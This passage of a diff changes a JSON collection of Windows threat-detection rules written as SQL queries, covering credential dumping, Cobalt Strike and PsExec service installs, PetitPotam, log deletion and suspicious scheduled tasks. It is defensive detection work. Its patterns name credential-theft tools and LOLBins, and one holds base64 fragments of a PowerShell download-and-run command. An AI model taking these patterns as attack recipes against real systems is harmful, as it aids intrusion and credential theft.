the source and not the Domain Controller.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.t1003.004" ], "falsepositives": [ - "Unlikely" + "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event." ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4692')" ], - "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml" }, { - "title": "GoToAssist Temporary Installation Artefact", - "id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", + "title": "Credential Dumping Tools Service Execution - Security", + "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\LogMeInInc\\\\GoToAssist Remote Support Expert\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "file_event_win_gotoopener_artefact.yml" + "filename": "win_security_mal_creddumper.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - File", - "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", - "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Scheduled Task Deletion", + "id": "4f86b304-3e02-40e3-aa5d-e88a167c9617", + "status": "experimental", + "description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME", + "author": "David Strassegger, Tim Shelton", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "car.2013-08-001", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Software installation" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4699' AND NOT ((TaskName LIKE '\\\\Microsoft\\\\Windows\\\\RemovalTools\\\\MRT\\_ERROR\\_HB' ESCAPE '\\') OR (TaskName LIKE '%\\\\Mozilla\\\\Firefox Default Browser Agent %' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "win_security_scheduled_task_deletion.yml" }, { - "title": "Unusual File Modification by dns.exe", - "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", - "status": "experimental", - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "title": "CobaltStrike Service Installations - Security", + "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "status": "test", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml" + "filename": "win_security_cobaltstrike_service_installs.yml" }, { - "title": "File Creation Date Changed to Another Year", - "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "title": "Invoke-Obfuscation Via Stdin - Security", + "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "status": "experimental", - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.t1070.006", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Changes made to or by the local NTP service" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((Image LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" ], - "filename": "file_change_win_2022_timestomping.yml" + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" }, { - "title": "Potential PrintNightmare Exploitation Attempt", - "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", - "status": "experimental", - "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", - "author": "Bhabesh Raj", + "title": "Addition of SID History to Active Directory Object", + "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", + "status": "stable", + "description": "An attacker can use the SID history attribute to gain additional privileges.", + "author": "Thomas Patzke, @atc_project (improvements)", "tags": [ "attack.persistence", - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.t1134.005" ], "falsepositives": [ - "Unknown" + "Migration of an account into a new domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4765', '4766') OR ((EventID = '4738' AND NOT ((SidHistory LIKE '-' ESCAPE '\\' OR SidHistory LIKE '\\%\\%1793' ESCAPE '\\'))) AND NOT (SidHistory = ''))))" ], - "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" + "filename": "win_security_susp_add_sid_history.yml" }, { - "title": "Unusual File Deletion by Dns.exe", - "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", - "status": "experimental", - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "title": "Protected Storage Service Access", + "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "status": "test", + "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" + "filename": "win_security_protected_storage_service_access.yml" }, { - "title": "Prefetch File Deleted", - "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "title": "Outgoing Logon with New Credentials", + "id": "def8b624-e08f-4ae1-8612-1ba21190da6b", "status": "experimental", - "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", - "author": "Cedric MAURUGEON", - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], + "description": "Detects logon events that specify new credentials", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate remote administration activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9')" ], - "filename": "file_delete_win_delete_prefetch.yml" + "filename": "win_security_susp_logon_newcredentials.yml" }, { - "title": "File Deleted Via Sysinternals SDelete", - "id": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", - "status": "test", - "description": "Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "AD Privileged Users or Groups Reconnaissance", + "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "status": "experimental", + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Legitime usage of SDelete" + "If source account name is not an admin then its super suspicious" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%.AAA' ESCAPE '\\' OR TargetFilename LIKE '%.ZZZ' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\Wireshark\\\\radius\\\\dictionary.alcatel-lucent.aaa' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml" + "filename": "win_security_account_discovery.yml" }, { - "title": "Backup Files Deleted", - "id": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "title": "Possible Impacket SecretDump Remote Activity", + "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", "status": "experimental", - "description": "Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", - "author": "frack113", + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "author": "Samir Bousseaden, wagga", "tags": [ - "attack.impact", - "attack.t1490" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" ], "falsepositives": [ - "Legitime usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.VHD' ESCAPE '\\' OR TargetFilename LIKE '%.bac' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.wbcat' ESCAPE '\\' OR TargetFilename LIKE '%.bkf' ESCAPE '\\' OR TargetFilename LIKE '%.set' ESCAPE '\\' OR TargetFilename LIKE '%.win' ESCAPE '\\' OR TargetFilename LIKE '%.dsk' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_backup_file.yml" + "filename": "win_security_impacket_secretdump.yml" }, { - "title": "PowerShell Console History Logs Deleted", - "id": "ff301988-c231-4bd0-834c-ac9d73b86586", - "status": "experimental", - "description": "Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Metasploit SMB Authentication", + "id": "72124974-a68b-4366-b990-d30e0b2a190d", + "status": "test", + "description": "Alerts on Metasploit host's authentications on the domain.", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Linux hostnames composed of 16 characters." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" ], - "filename": "file_delete_win_delete_powershell_command_history.yml" + "filename": "win_security_metasploit_authentication.yml" }, { - "title": "IIS WebServer Access Logs Deleted", - "id": "3eb8c339-a765-48cc-a150-4364c04652bf", + "title": "Possible Shadow Credentials Added", + "id": "f598ea0c-c25a-4f72-a219-50c44411c791", "status": "experimental", - "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects possible addition of shadow credentials to an active directory object.", + "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.credential_access", + "attack.t1556" ], "falsepositives": [ - "During uninstallation of the IIS service", - "During log rotation" + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\inetpub\\\\logs\\\\LogFiles\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" ], - "filename": "file_delete_win_delete_iis_access_logs.yml" + "filename": "win_security_susp_possible_shadow_credentials_added.yml" }, { - "title": "Tomcat WebServer Logs Deleted", - "id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", + "title": "Access Token Abuse", + "id": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", "status": "experimental", - "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", + "author": "Michaela Adams, Zach Mathis", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.privilege_escalation", + "attack.t1134.001" ], "falsepositives": [ - "During uninstallation of the tomcat server", - "During log rotation" + "Anti-Virus" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Tomcat%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\logs\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%catalina.%' ESCAPE '\\' OR TargetFilename LIKE '%\\_access\\_log.%' ESCAPE '\\' OR TargetFilename LIKE '%localhost.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'Advapi' AND AuthenticationPackageName = 'Negotiate' AND ImpersonationLevel LIKE '\\%\\%1833' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_tomcat_logs.yml" + "filename": "win_security_access_token_abuse.yml" }, { - "title": "EventLog EVTX File Deleted", - "id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", + "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "status": "experimental", - "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.evtx' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" ], - "filename": "file_delete_win_delete_event_log_files.yml" + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" }, { - "title": "TeamViewer Log File Deleted", - "id": "b1decb61-ed83-4339-8e95-53ea51901720", - "status": "test", - "description": "Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence", - "author": "frack113", + "title": "Possible PetitPotam Coerce Authentication Attempt", + "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", + "status": "experimental", + "description": "Detect PetitPotam coerced authentication activity.", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "Unknown" + "Unknown. Feedback welcomed." ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\TeamViewer\\_%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" ], - "filename": "file_delete_win_delete_teamviewer_logs.yml" + "filename": "win_security_petitpotam_network_share.yml" }, { - "title": "Exchange PowerShell Cmdlet History Deleted", - "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "title": "Suspicious Scheduled Task Update", + "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "status": "experimental", - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "description": "Detects update to a scheduled task event that contain suspicious keywords.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Possible FP during log rotation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_delete_win_delete_exchange_powershell_logs.yml" + "filename": "win_security_susp_scheduled_task_update.yml" }, { - "title": "Suspicious Access To Browser Credential Files", - "id": "91cb43db-302a-47e3-b3c8-7ede481e27bf", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", - "author": "frack113", + "title": "Windows Defender Exclusion Set", + "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "status": "test", + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "author": "@BarryShooshooga", "tags": [ - "attack.t1003", 